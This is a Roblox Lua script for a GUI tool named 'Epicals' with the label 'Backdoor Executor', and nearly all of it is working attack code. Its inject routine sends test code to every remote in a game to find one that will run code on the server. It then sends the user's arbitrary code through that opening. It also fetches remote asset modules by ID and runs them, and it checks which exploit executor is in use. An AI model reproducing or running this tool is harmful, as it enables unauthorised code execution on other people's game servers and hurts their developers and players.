-- Generated using RoadToGlory's Converter v1.1 (RoadToGlory#9879)

-- Instances:

local Converted = {
	["_epicals"] = Instance.new("ScreenGui");
	["_open"] = Instance.new("Frame");
	["_ImageLabel"] = Instance.new("ImageLabel");
	["_LocalScript"] = Instance.new("LocalScript");
	["_Frame"] = Instance.new("Frame");
	["_Frame1"] = Instance.new("Frame");
	["_UICorner"] = Instance.new("UICorner");
	["_LocalScript1"] = Instance.new("LocalScript");
	["_ImageButton"] = Instance.new("ImageButton");
	["_LocalScript2"] = Instance.new("LocalScript");
	["_main"] = Instance.new("Frame");
	["_Frame2"] = Instance.new("Frame");
	["_UICorner1"] = Instance.new("UICorner");
	["_ScrollingFrame"] = Instance.new("ScrollingFrame");
	["_Main"] = Instance.new("Frame");
	["_TextLabel"] = Instance.new("TextLabel");
	["_exe"] = Instance.new("TextButton");
	["_LocalScript3"] = Instance.new("LocalScript");
	["_cls"] = Instance.new("TextButton");
	["_inj"] = Instance.new("TextButton");
	["_TextBox"] = Instance.new("TextBox");
	["_TextLabel1"] = Instance.new("TextLabel");
	["_LocalScript4"] = Instance.new("LocalScript");
	["_ModuleScript"] = Instance.new("ModuleScript");
	["_ScrollingFrame1"] = Instance.new("ScrollingFrame");
	["_UIListLayout"] = Instance.new("UIListLayout");
	["_p"] = Instance.new("TextButton");
	["_LocalScript5"] = Instance.new("LocalScript");
	["_p1"] = Instance.new("TextButton");
	["_LocalScript6"] = Instance.new("LocalScript");
	["_reqbox"] = Instance.new("TextBox");
	["_reqboxmed"] = Instance.new("TextBox");
	["_req"] = Instance.new("TextButton");
	["_LocalScript7"] = Instance.new("LocalScript");
	["_reqboxmedmed"] = Instance.new("TextBox");
	["_UICorner2"] = Instance.new("UICorner");
	["_Icon"] = Instance.new("ImageLabel");
	["_TextLabel2"] = Instance.new("TextLabel");
	["_TextButton"] = Instance.new("TextButton");
	["_LocalScript8"] = Instance.new("LocalScript");
	["_Dragify"] = Instance.new("LocalScript");
	["_api_module_epicals"] = Instance.new("ModuleScript");
	["_Loadstring"] = Instance.new("ModuleScript");
	["_FiOne"] = Instance.new("ModuleScript");
	["_Yueliang"] = Instance.new("ModuleScript");
	["_code_examples"] = Instance.new("LocalScript");
}

-- Properties:

Converted["_epicals"].ZIndexBehavior = Enum.ZIndexBehavior.Sibling
Converted["_epicals"].Name = "epicals"
Converted["_epicals"].Parent = game:GetService("CoreGui")

Converted["_open"].AnchorPoint = Vector2.new(0, 1)
Converted["_open"].BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Converted["_open"].BackgroundTransparency = 1
Converted["_open"].BorderColor3 = Color3.fromRGB(0, 0, 0)
Converted["_open"].BorderSizePixel = 0
Converted["_open"].Position = UDim2.new(0, 0, 1, 0)
Converted["_open"].Size = UDim2.new(0.12655279, 0, 0.154522613, 0)
Converted["_open"].Name = "open"
Converted["_open"].Parent = Converted["_epicals"]

Converted["_ImageLabel"].Image = "rbxassetid://17871076086"
Converted["_ImageLabel"].ImageContent = Content
Converted["_ImageLabel"].BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Converted["_ImageLabel"].BackgroundTransparency = 1
Converted["_ImageLabel"].BorderColor3 = Color3.fromRGB(0, 0, 0)
Converted["_ImageLabel"].BorderSizePixel = 0
Converted["_ImageLabel"].Position = UDim2.new(0.0112105757, 0, -0.00697537558, 0)
Converted["_ImageLabel"].Size = UDim2.new(0, 122, 0, 121)
Converted["_ImageLabel"].ZIndex = 0
Converted["_ImageLabel"].Parent = Converted["_open"]

Converted["_Frame"].BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Converted["_Frame"].BackgroundTransparency = 1
Converted["_Frame"].BorderColor3 = Color3.fromRGB(0, 0, 0)
Converted["_Frame"].BorderSizePixel = 0
Converted["_Frame"].Size = UDim2.new(0, 122, 0, 121)
Converted["_Frame"].ZIndex = 0
Converted["_Frame"].Parent = Converted["_open"]

Converted["_Frame1"].BackgroundColor3 = Color3.fromRGB(255, 225.00001698732376, 0)
Converted["_Frame1"].BorderColor3 = Color3.fromRGB(0, 0, 0)
Converted["_Frame1"].BorderSizePixel = 0
Converted["_Frame1"].Position = UDim2.new(0.786885262, 0, -0.00826446246, 0)
Converted["_Frame1"].Size = UDim2.new(0, 27, 0, 29)
Converted["_Frame1"].Parent = Converted["_Frame"]

Converted["_UICorner"].CornerRadius = UDim.new(0, 999)
Converted["_UICorner"].Parent = Converted["_Frame1"]

Converted["_ImageButton"].Image = "rbxassetid://78976970"
Converted["_ImageButton"].ImageContent = Content
Converted["_ImageButton"].BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Converted["_ImageButton"].BackgroundTransparency = 1
Converted["_ImageButton"].BorderColor3 = Color3.fromRGB(0, 0, 0)
Converted["_ImageButton"].BorderSizePixel = 0
Converted["_ImageButton"].Position = UDim2.new(0.079136692, 0, 0.0704225376, 0)
Converted["_ImageButton"].Size = UDim2.new(0, 100, 0, 100)
Converted["_ImageButton"].ZIndex = 0
Converted["_ImageButton"].Parent = Converted["_open"]

Converted["_main"].BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Converted["_main"].BorderColor3 = Color3.fromRGB(0, 0, 0)
Converted["_main"].BorderSizePixel = 0
Converted["_main"].Position = UDim2.new(0.317546576, 0, 0.204773873, 0)
Converted["_main"].Size = UDim2.new(0, 455, 0, 43)
Converted["_main"].Visible = false
Converted["_main"].Name = "main"
Converted["_main"].Parent = Converted["_epicals"]

Converted["_Frame2"].BackgroundColor3 = Color3.fromRGB(47.0000009983778, 47.0000009983778, 47.0000009983778)
Converted["_Frame2"].BorderColor3 = Color3.fromRGB(0, 0, 0)
Converted["_Frame2"].BorderSizePixel = 0
Converted["_Frame2"].Position = UDim2.new(0, 0, 0.808971345, 0)
Converted["_Frame2"].Size = UDim2.new(0, 455, 0, 253)
Converted["_Frame2"].Parent = Converted["_main"]

Converted["_UICorner1"].Parent = Converted["_Frame2"]

Converted["_ScrollingFrame"].CanvasSize = UDim2.new(0, 0, 7, 0)
Converted["_ScrollingFrame"].Active = true
Converted["_ScrollingFrame"].BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Converted["_ScrollingFrame"].BackgroundTransparency = 1
Converted["_ScrollingFrame"].BorderColor3 = Color3.fromRGB(0, 0, 0)
Converted["_ScrollingFrame"].BorderSizePixel = 0
Converted["_ScrollingFrame"].Size = UDim2.new(0, 455, 0, 253)
Converted["_ScrollingFrame"].Parent = Converted["_Frame2"]

Converted["_Main"].BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Converted["_Main"].BackgroundTransparency = 1
Converted["_Main"].BorderColor3 = Color3.fromRGB(0, 0, 0)
Converted["_Main"].BorderSizePixel = 0
Converted["_Main"].Size = UDim2.new(1, 0, 1, 0)
Converted["_Main"].Name = "Main"
Converted["_Main"].Parent = Converted["_ScrollingFrame"]

Converted["_TextLabel"].Font = Enum.Font.Arial
Converted["_TextLabel"].Text = "Backdoor Executor"
Converted["_TextLabel"].TextColor3 = Color3.fromRGB(255, 255, 255)
Converted["_TextLabel"].TextSize = 21
Converted["_TextLabel"].BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Converted["_TextLabel"].BackgroundTransparency = 1
Converted["_TextLabel"].BorderColor3 = Color3.fromRGB(0, 0, 0)
Converted["_TextLabel"].BorderSizePixel = 0
Converted["_TextLabel"].Position = UDim2.new(0, 0, 0.0169395823, 0)
Converted["_TextLabel"].Size = UDim2.new(0, 455, 0, -20)
Converted["_TextLabel"].Parent = Converted["_Main"]

Converted["_exe"].Font = Enum.Font.Arial
Converted["_exe"].RichText = true
Converted["_exe"].Text = "Execute"
Converted["_exe"].TextColor3 = Color3.fromRGB(255, 255, 255)
Converted["_exe"].TextSize = 22
Converted["_exe"].BackgroundColor3 = Color3.fromRGB(0, 0, 0)
Converted["_exe"].BorderColor3 = Color3.fromRGB(255, 255, 255)
Converted["_exe"].Position = UDim2.new(0.0285714287, 0, 0.20271033, 0)
Converted["_exe"].Size = UDim2.new(0, 99, 0, 23)
Converted["_exe"].Name = "exe"
Converted["_exe"].Parent = Converted["_Main"]

Converted["_cls"].Font = Enum.Font.Arial
Converted["_cls"].RichText = true
Converted["_cls"].Text = "Clear"
Converted["_cls"].TextColor3 = Color3.fromRGB(255, 255, 255)
Converted["_cls"].TextSize = 22
Converted["_cls"].BackgroundColor3 = Color3.fromRGB(0, 0, 0)
Converted["_cls"].BorderColor3 = Color3.fromRGB(255, 255, 255)
Converted["_cls"].Position = UDim2.new(0.263736278, 0, 0.20271033, 0)
Converted["_cls"].Size = UDim2.new(0, 99, 0, 23)
Converted["_cls"].Name = "cls"
Converted["_cls"].Parent = Converted["_Main"]

Converted["_inj"].Font = Enum.Font.Arial
Converted["_inj"].RichText = true
Converted["_inj"].Text = "Inject"
Converted["_inj"].TextColor3 = Color3.fromRGB(255, 255, 255)
Converted["_inj"].TextSize = 22
Converted["_inj"].BackgroundColor3 = Color3.fromRGB(0, 0, 0)
Converted["_inj"].BorderColor3 = Color3.fromRGB(255, 255, 255)
Converted["_inj"].Position = UDim2.new(0.74505496, 0, 0.20271033, 0)
Converted["_inj"].Size = UDim2.new(0, 99, 0, 23)
Converted["_inj"].Name = "inj"
Converted["_inj"].Parent = Converted["_Main"]

Converted["_TextBox"].Font = Enum.Font.RobotoMono
Converted["_TextBox"].PlaceholderText = "-- write ur code here lol"
Converted["_TextBox"].Text = ""
Converted["_TextBox"].TextColor3 = Color3.fromRGB(255, 255, 255)
Converted["_TextBox"].TextSize = 17
Converted["_TextBox"].TextWrapped = true
Converted["_TextBox"].TextXAlignment = Enum.TextXAlignment.Left
Converted["_TextBox"].TextYAlignment = Enum.TextYAlignment.Top
Converted["_TextBox"].BackgroundColor3 = Color3.fromRGB(29.000002071261406, 29.000002071261406, 29.000002071261406)
Converted["_TextBox"].BorderColor3 = Color3.fromRGB(255, 255, 255)
Converted["_TextBox"].Position = UDim2.new(0.0285714287, 0, 0.0214568041, 0)
Converted["_TextBox"].Size = UDim2.new(0, 425, 0, 310)
Converted["_TextBox"].Parent = Converted["_Main"]

Converted["_TextLabel1"].Font = Enum.Font.RobotoMono
Converted["_TextLabel1"].RichText = true
Converted["_TextLabel1"].Text = ""
Converted["_TextLabel1"].TextColor3 = Color3.fromRGB(255, 255, 255)
Converted["_TextLabel1"].TextSize = 17
Converted["_TextLabel1"].TextWrapped = true
Converted["_TextLabel1"].TextXAlignment = Enum.TextXAlignment.Left
Converted["_TextLabel1"].TextYAlignment = Enum.TextYAlignment.Top
Converted["_TextLabel1"].BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Converted["_TextLabel1"].BackgroundTransparency = 1
Converted["_TextLabel1"].BorderColor3 = Color3.fromRGB(0, 0, 0)
Converted["_TextLabel1"].BorderSizePixel = 0
Converted["_TextLabel1"].Size = UDim2.new(1, 0, 1, 0)
Converted["_TextLabel1"].Parent = Converted["_TextBox"]

Converted["_ScrollingFrame1"].CanvasSize = UDim2.new(0, 0, 3, 0)
Converted["_ScrollingFrame1"].ScrollBarImageColor3 = Color3.fromRGB(0, 0, 0)
Converted["_ScrollingFrame1"].Active = true
Converted["_ScrollingFrame1"].BackgroundColor3 = Color3.fromRGB(65.0000037252903, 65.0000037252903, 65.0000037252903)
Converted["_ScrollingFrame1"].BorderColor3 = Color3.fromRGB(255, 255, 255)
Converted["_ScrollingFrame1"].Position = UDim2.new(0.0285714287, 0, 0.219649911, 0)
Converted["_ScrollingFrame1"].Size = UDim2.new(0, 206, 0, 264)
Converted["_ScrollingFrame1"].Parent = Converted["_Main"]

Converted["_UIListLayout"].SortOrder = Enum.SortOrder.LayoutOrder
Converted["_UIListLayout"].Parent = Converted["_ScrollingFrame1"]

Converted["_p"].Font = Enum.Font.Arial
Converted["_p"].Text = "polaria"
Converted["_p"].TextColor3 = Color3.fromRGB(255, 255, 255)
Converted["_p"].TextSize = 22
Converted["_p"].TextWrapped = true
Converted["_p"].TextXAlignment = Enum.TextXAlignment.Left
Converted["_p"].BackgroundColor3 = Color3.fromRGB(89.00000229477882, 89.00000229477882, 89.00000229477882)
Converted["_p"].BorderColor3 = Color3.fromRGB(255, 255, 255)
Converted["_p"].Position = UDim2.new(0, 0, -4.62387561e-07, 0)
Converted["_p"].Size = UDim2.new(0, 195, 0, 27)
Converted["_p"].Name = "p"
Converted["_p"].Parent = Converted["_ScrollingFrame1"]

Converted["_p1"].Font = Enum.Font.Arial
Converted["_p1"].Text = "exser"
Converted["_p1"].TextColor3 = Color3.fromRGB(255, 255, 255)
Converted["_p1"].TextSize = 22
Converted["_p1"].TextWrapped = true
Converted["_p1"].TextXAlignment = Enum.TextXAlignment.Left
Converted["_p1"].BackgroundColor3 = Color3.fromRGB(89.00000229477882, 89.00000229477882, 89.00000229477882)
Converted["_p1"].BorderColor3 = Color3.fromRGB(255, 255, 255)
Converted["_p1"].Position = UDim2.new(0, 0, -4.62387561e-07, 0)
Converted["_p1"].Size = UDim2.new(0, 195, 0, 27)
Converted["_p1"].Name = "p"
Converted["_p1"].Parent = Converted["_ScrollingFrame1"]

Converted["_reqbox"].Font = Enum.Font.Arial
Converted["_reqbox"].PlaceholderText = "id"
Converted["_reqbox"].Text = ""
Converted["_reqbox"].TextColor3 = Color3.fromRGB(0, 0, 0)
Converted["_reqbox"].TextSize = 14
Converted["_reqbox"].BackgroundColor3 = Color3.fromRGB(84.00000259280205, 84.00000259280205, 84.00000259280205)
Converted["_reqbox"].BorderColor3 = Color3.fromRGB(255, 255, 255)
Converted["_reqbox"].Position = UDim2.new(0.503296733, 0, 0.222473174, 0)
Converted["_reqbox"].Size = UDim2.new(0, 209, 0, 24)
Converted["_reqbox"].Name = "reqbox"
Converted["_reqbox"].Parent = Converted["_Main"]

Converted["_reqboxmed"].Font = Enum.Font.Arial
Converted["_reqboxmed"].PlaceholderText = "method"
Converted["_reqboxmed"].Text = ""
Converted["_reqboxmed"].TextColor3 = Color3.fromRGB(0, 0, 0)
Converted["_reqboxmed"].TextSize = 14
Converted["_reqboxmed"].BackgroundColor3 = Color3.fromRGB(84.00000259280205, 84.00000259280205, 84.00000259280205)
Converted["_reqboxmed"].BorderColor3 = Color3.fromRGB(255, 255, 255)
Converted["_reqboxmed"].Position = UDim2.new(0.503296733, 0, 0.241106719, 0)
Converted["_reqboxmed"].Size = UDim2.new(0, 209, 0, 24)
Converted["_reqboxmed"].Name = "reqboxmed"
Converted["_reqboxmed"].Parent = Converted["_Main"]

Converted["_req"].Font = Enum.Font.Arial
Converted["_req"].RichText = true
Converted["_req"].Text = "Start Require"
Converted["_req"].TextColor3 = Color3.fromRGB(255, 255, 255)
Converted["_req"].TextSize = 22
Converted["_req"].BackgroundColor3 = Color3.fromRGB(0, 0, 0)
Converted["_req"].BorderColor3 = Color3.fromRGB(255, 255, 255)
Converted["_req"].Position = UDim2.new(0.503296733, 0, 0.278373837, 0)
Converted["_req"].Size = UDim2.new(0, 209, 0, 23)
Converted["_req"].Name = "req"
Converted["_req"].Parent = Converted["_Main"]

Converted["_reqboxmedmed"].Font = Enum.Font.Arial
Converted["_reqboxmedmed"].PlaceholderText = ". or :"
Converted["_reqboxmedmed"].Text = ""
Converted["_reqboxmedmed"].TextColor3 = Color3.fromRGB(0, 0, 0)
Converted["_reqboxmedmed"].TextSize = 14
Converted["_reqboxmedmed"].BackgroundColor3 = Color3.fromRGB(84.00000259280205, 84.00000259280205, 84.00000259280205)
Converted["_reqboxmedmed"].BorderColor3 = Color3.fromRGB(255, 255, 255)
Converted["_reqboxmedmed"].Position = UDim2.new(0.503296733, 0, 0.260304898, 0)
Converted["_reqboxmedmed"].Size = UDim2.new(0, 209, 0, 24)
Converted["_reqboxmedmed"].Name = "reqboxmedmed"
Converted["_reqboxmedmed"].Parent = Converted["_Main"]

Converted["_UICorner2"].Parent = Converted["_main"]

Converted["_Icon"].Image = "rbxassetid://78976970"
Converted["_Icon"].ImageContent = Content
Converted["_Icon"].BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Converted["_Icon"].BackgroundTransparency = 1
Converted["_Icon"].BorderColor3 = Color3.fromRGB(0, 0, 0)
Converted["_Icon"].BorderSizePixel = 0
Converted["_Icon"].Position = UDim2.new(0.0285714287, 0, 0.0961076617, 0)
Converted["_Icon"].Size = UDim2.new(0, 24, 0, 24)
Converted["_Icon"].Name = "Icon"
Converted["_Icon"].Parent = Converted["_main"]

Converted["_TextLabel2"].Font = Enum.Font.SourceSansSemibold
Converted["_TextLabel2"].Text = "Epicals"
Converted["_TextLabel2"].TextColor3 = Color3.fromRGB(0, 0, 0)
Converted["_TextLabel2"].TextScaled = true
Converted["_TextLabel2"].TextSize = 35
Converted["_TextLabel2"].TextWrapped = true
Converted["_TextLabel2"].TextXAlignment = Enum.TextXAlignment.Left
Converted["_TextLabel2"].BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Converted["_TextLabel2"].BorderColor3 = Color3.fromRGB(0, 0, 0)
Converted["_TextLabel2"].BorderSizePixel = 0
Converted["_TextLabel2"].Position = UDim2.new(1.27272797, 0, -0.157894775, 0)
Converted["_TextLabel2"].Size = UDim2.new(0, 165, 0, 27)
Converted["_TextLabel2"].Parent = Converted["_Icon"]

Converted["_TextButton"].Font = Enum.Font.Unknown
Converted["_TextButton"].Text = "X"
Converted["_TextButton"].TextColor3 = Color3.fromRGB(0, 0, 0)
Converted["_TextButton"].TextSize = 17
Converted["_TextButton"].TextWrapped = true
Converted["_TextButton"].BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Converted["_TextButton"].BorderColor3 = Color3.fromRGB(0, 0, 0)
Converted["_TextButton"].BorderSizePixel = 0
Converted["_TextButton"].Position = UDim2.new(0.854945064, 0, 0.116279244, 0)
Converted["_TextButton"].Size = UDim2.new(0, 58, 0, 20)
Converted["_TextButton"].Parent = Converted["_main"]

-- Fake Module Scripts:

local fake_module_scripts = {}

do -- Fake Module: StarterGui.epicals.api_module_epicals
    local script = Instance.new("ModuleScript")
    script.Name = "api_module_epicals"
    script.Parent = Converted["_epicals"]
    local function module_script()
		local api = {}
		
		api.gethttp=function(url:string)
			local exec_name = (getexecutor or getexecutorname or getidentityexecutor or identifyexecutor or function() return 'Unknown' end)()
			if not ( exec_name == 'Unknown' ) then
				return game:HttpGet(url
				)
			else
				return nil
			end
		end
		
		api.getobjs=function(url:string)
			api.ifcusenv(function()
				return game:GetObjects(url)
			end, function()
				print('not on cus env')
			end)
		end
		
		api.ifcusenv=function(func, func2)
			local exec_name = (getexecutor or getexecutorname or getidentityexecutor or identifyexecutor or function() return 'Unknown' end)()
			if not ( exec_name == 'Unknown' ) then
				func()
			else
				if func2 == nil then
					return
				else
					func2()
				end
			end
		end
		
		api.load=function(stringa)
			local loadstring = ( loadstring or require(script:WaitForChild('Loadstring')) )
			loadstring(stringa)()
		end
		
		api.idreq = function(id: number)
			local id = tostring(id)
			local baseid = 'rbxassetid://' .. id
			return require(api.getobjs(baseid)[1])
		end
		
		return api
		
    end
    fake_module_scripts[script] = module_script
end

-- Fake Local Scripts:

local function RYPGUD_fake_script() -- Fake Script: StarterGui.epicals.open.ImageLabel.LocalScript
    local script = Instance.new("LocalScript")
    script.Name = "LocalScript"
    script.Parent = Converted["_ImageLabel"]
    local req = require
    local require = function(obj)
        local fake = fake_module_scripts[obj]
        if fake then
            return fake()
        end
        return req(obj)
    end

	while wait() do
		script.Parent.Rotation += 1
	end
end
local function FPLSAE_fake_script() -- Fake Script: StarterGui.epicals.open.Frame.LocalScript
    local script = Instance.new("LocalScript")
    script.Name = "LocalScript"
    script.Parent = Converted["_Frame"]
    local req = require
    local require = function(obj)
        local fake = fake_module_scripts[obj]
        if fake then
            return fake()
        end
        return req(obj)
    end

	while wait() do
		script.Parent.Rotation += 1
	end
end
local function NPFGY_fake_script() -- Fake Script: StarterGui.epicals.open.ImageButton.LocalScript
    local script = Instance.new("LocalScript")
    script.Name = "LocalScript"
    script.Parent = Converted["_ImageButton"]
    local req = require
    local require = function(obj)
        local fake = fake_module_scripts[obj]
        if fake then
            return fake()
        end
        return req(obj)
    end

	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Visible = false
		script.Parent.Parent.Parent.main.Visible = true
	end)
end
local function FFYVTP_fake_script() -- Fake Script: StarterGui.epicals.main.Frame.ScrollingFrame.Main.exe.LocalScript
    local script = Instance.new("LocalScript")
    script.Name = "LocalScript"
    script.Parent = Converted["_exe"]
    local req = require
    local require = function(obj)
        local fake = fake_module_scripts[obj]
        if fake then
            return fake()
        end
        return req(obj)
    end

	local bckdoor
	
	script.Parent.Parent.cls.MouseButton1Click:Connect(function()
		script.Parent.Parent.TextBox.Text = ''
	end)
	
	script.Parent.Parent.inj.MouseButton1Click:Connect(function()
		for _, v in pairs(game:GetDescendants()) do
			if v:IsA('RemoteEvent') or v:IsA('RemoteFunction') then
				if v:IsA('RemoteEvent') then
					v:FireServer('local a = Instance.new("Script"); a.Name = "BackdoorScriptTestAssurance";')
					if workspace:FindFirstChild("BackdoorScriptTestAssurance") then
						bckdoor = v
						workspace.BackdoorScriptTestAssurance:Destroy()
						break
					end
				elseif v:IsA('RemoteFunction') then
					v:InvokeServer('local a = Instance.new("Script"); a.Name = "BackdoorScriptTestAssurance";')
					if workspace:FindFirstChild("BackdoorScriptTestAssurance") then
						bckdoor = v
						workspace.BackdoorScriptTestAssurance:Destroy()
						break
					end
				end
			end
		end
	end)
	
	script.Parent.MouseButton1Click:Connect(function()
		if bckdoor ~= nil then
			if bckdoor:IsA('RemoteEvent') then
				bckdoor:FireServer(script.Parent.Parent.TextBox.Text)
			elseif bckdoor:IsA('RemoteFunction') then
				bckdoor:InvokeServer(script.Parent.Parent.TextBox.Text)
			end
		else
			script.Parent.Text = 'No backdoor'
			wait(1)
			script.Parent.Text = 'Execute'
		end
	end)
end
local function ZYPE_fake_script() -- Fake Script: StarterGui.epicals.main.Frame.ScrollingFrame.Main.TextBox.LocalScript
    local script = Instance.new("LocalScript")
    script.Name = "LocalScript"
    script.Parent = Converted["_TextBox"]
    local req = require
    local require = function(obj)
        local fake = fake_module_scripts[obj]
        if fake then
            return fake()
        end
        return req(obj)
    end

	script.Parent:GetPropertyChangedSignal('Text'):Connect(function()
		script.Parent.TextLabel.Text = require(script.Parent.LocalScript.ModuleScript).run(script.Parent.Text)
	end)
end
local function BFAYMB_fake_script() -- Fake Script: StarterGui.epicals.main.Frame.ScrollingFrame.Main.ScrollingFrame.p.LocalScript
    local script = Instance.new("LocalScript")
    script.Name = "LocalScript"
    script.Parent = Converted["_p"]
    local req = require
    local require = function(obj)
        local fake = fake_module_scripts[obj]
        if fake then
            return fake()
        end
        return req(obj)
    end

	script.Parent.MouseButton1Click:Connect(function()
		ifcusenv=function(func, func2)
			local exec_name = (getexecutor or getexecutorname or getidentityexecutor or identifyexecutor or function() return 'Unknown' end)()
			if not ( exec_name == 'Unknown' ) then
				func()
			else
				if func2 == nil then
					return
				else
					func2()
				end
			end
		end
		getobjs=function(url:string)
			ifcusenv(function()
				return game:GetObjects(url)
			end, function()
				print('not on cus env')
			end)
		end
		local idreq = function(id: number)
			local id = tostring(id)
			local baseid = 'rbxassetid://' .. id
			return require(getobjs(id)[1])
		end
		idreq(123255432303221):Pload(game.Players.LocalPlayer.Name)
	end)
end
local function NUWBZVY_fake_script() -- Fake Script: StarterGui.epicals.main.Frame.ScrollingFrame.Main.ScrollingFrame.p.LocalScript
    local script = Instance.new("LocalScript")
    script.Name = "LocalScript"
    script.Parent = Converted["_p1"]
    local req = require
    local require = function(obj)
        local fake = fake_module_scripts[obj]
        if fake then
            return fake()
        end
        return req(obj)
    end

	script.Parent.MouseButton1Click:Connect(function()
		ifcusenv=function(func, func2)
			local exec_name = (getexecutor or getexecutorname or getidentityexecutor or identifyexecutor or function() return 'Unknown' end)()
			if not ( exec_name == 'Unknown' ) then
				func()
			else
				if func2 == nil then
					return
				else
					func2()
				end
			end
		end
		getobjs=function(url:string)
			ifcusenv(function()
				return game:GetObjects(url)
			end, function()
				print('not on cus env')
			end)
		end
		local idreq = function(id: number)
			local id = tostring(id)
			local baseid = 'rbxassetid://' .. id
			return require(getobjs(id)[1])
		end
		idreq(10868847330):pls(game.Players.LocalPlayer.Name)
	end)
end
local function CLOHM_fake_script() -- Fake Script: StarterGui.epicals.main.Frame.ScrollingFrame.Main.req.LocalScript
    local script = Instance.new("LocalScript")
    script.Name = "LocalScript"
    script.Parent = Converted["_req"]
    local req = require
    local require = function(obj)
        local fake = fake_module_scripts[obj]
        if fake then
            return fake()
        end
        return req(obj)
    end

	script.Parent.MouseButton1Click:Connect(function()
		local reqText = script.Parent.Parent.reqbox.Text
		local medText = script.Parent.Parent.reqboxmed.Text
		local medmedText = script.Parent.Parent.reqboxmedmed.Text
		
		local api = require(game.Players.LocalPlayer.PlayerGui.epicals.api_module_epicals)
		
		local obj=api.getobjs(tonumber(reqText))
		if obj then obj = obj[1] else print('invalid obj')end
		if obj then
			obj.Parent = game.ReplicatedStorage
			obj.Name = 'MainModule'
			if medText == "" then
				require(obj)()
			else
				api.load(string.format('require(%s)%s%s(%s)', obj:GetFullName(), medmedText, medText, game.Players.LocalPlayer.Name))
			end
		end
	end)
end
local function RTHWPNS_fake_script() -- Fake Script: StarterGui.epicals.main.TextButton.LocalScript
    local script = Instance.new("LocalScript")
    script.Name = "LocalScript"
    script.Parent = Converted["_TextButton"]
    local req = require
    local require = function(obj)
        local fake = fake_module_scripts[obj]
        if fake then
            return fake()
        end
        return req(obj)
    end

	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Visible = false
		script.Parent.Parent.Parent.open.Visible = true
	end)
end
local function QDZWOG_fake_script() -- Fake Script: StarterGui.epicals.main.Dragify
    local script = Instance.new("LocalScript")
    script.Name = "Dragify"
    script.Parent = Converted["_main"]
    local req = require
    local require = function(obj)
        local fake = fake_module_scripts[obj]
        if fake then
            return fake()
        end
        return req(obj)
    end

	local UIS = game:GetService("UserInputService")
	function dragify(Frame)
		dragToggle = nil
		dragSpeed = 0.15
		dragInput = nil
		dragStart = nil
		dragPos = nil
		function updateInput(input)
			Delta = input.Position - dragStart
			Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + Delta.X, startPos.Y.Scale, startPos.Y.Offset + Delta.Y)
			game:GetService("TweenService"):Create(Frame, TweenInfo.new(0.15), {Position = Position}):Play()
		end
		Frame.InputBegan:Connect(function(input)
			if (input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch) and UIS:GetFocusedTextBox() == nil then
				dragToggle = true
				dragStart = input.Position
				startPos = Frame.Position
				input.Changed:Connect(function()
					if input.UserInputState == Enum.UserInputState.End then
						dragToggle = false
					end
				end)
			end
		end)
		Frame.InputChanged:Connect(function(input)
			if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then
				dragInput = input
			end
		end)
		game:GetService("UserInputService").InputChanged:Connect(function(input)
			if input == dragInput and dragToggle then
				updateInput(input)
			end
		end)
	end
	dragify(script.Parent)
	
end
local function NNYQI_fake_script() -- Fake Script: StarterGui.epicals.code_examples
    local script = Instance.new("LocalScript")
    script.Name = "code_examples"
    script.Parent = Converted["_epicals"]
    local req = require
    local require = function(obj)
        local fake = fake_module_scripts[obj]
        if fake then
            return fake()
        end
        return req(obj)
    end

	-- idreq
	--[[
		ifcusenv=function(func, func2)
			local exec_name = (getexecutor or getexecutorname or getidentityexecutor or identifyexecutor or function() return 'Unknown' end)()
			if not ( exec_name == 'Unknown' ) then
				func()
			else
				if func2 == nil then
					return
				else
					func2()
				end
			end
		end
		getobjs=function(url:string)
			ifcusenv(function()
				return game:GetObjects(url)
			end, function()
				print('not on cus env')
			end)
		end
		local idreq = function(id: number)
			local id = tostring(id)
			local baseid = 'rbxassetid://' .. id
			return require(getobjs(id)[1])
		end
		idreq(123255432303221):Pload(game.Players.LocalPlayer.Name)
	--]]
end

coroutine.wrap(RYPGUD_fake_script)()
coroutine.wrap(FPLSAE_fake_script)()
coroutine.wrap(NPFGY_fake_script)()
coroutine.wrap(FFYVTP_fake_script)()
coroutine.wrap(ZYPE_fake_script)()
coroutine.wrap(BFAYMB_fake_script)()
coroutine.wrap(NUWBZVY_fake_script)()
coroutine.wrap(CLOHM_fake_script)()
coroutine.wrap(RTHWPNS_fake_script)()
coroutine.wrap(QDZWOG_fake_script)()
coroutine.wrap(NNYQI_fake_script)()
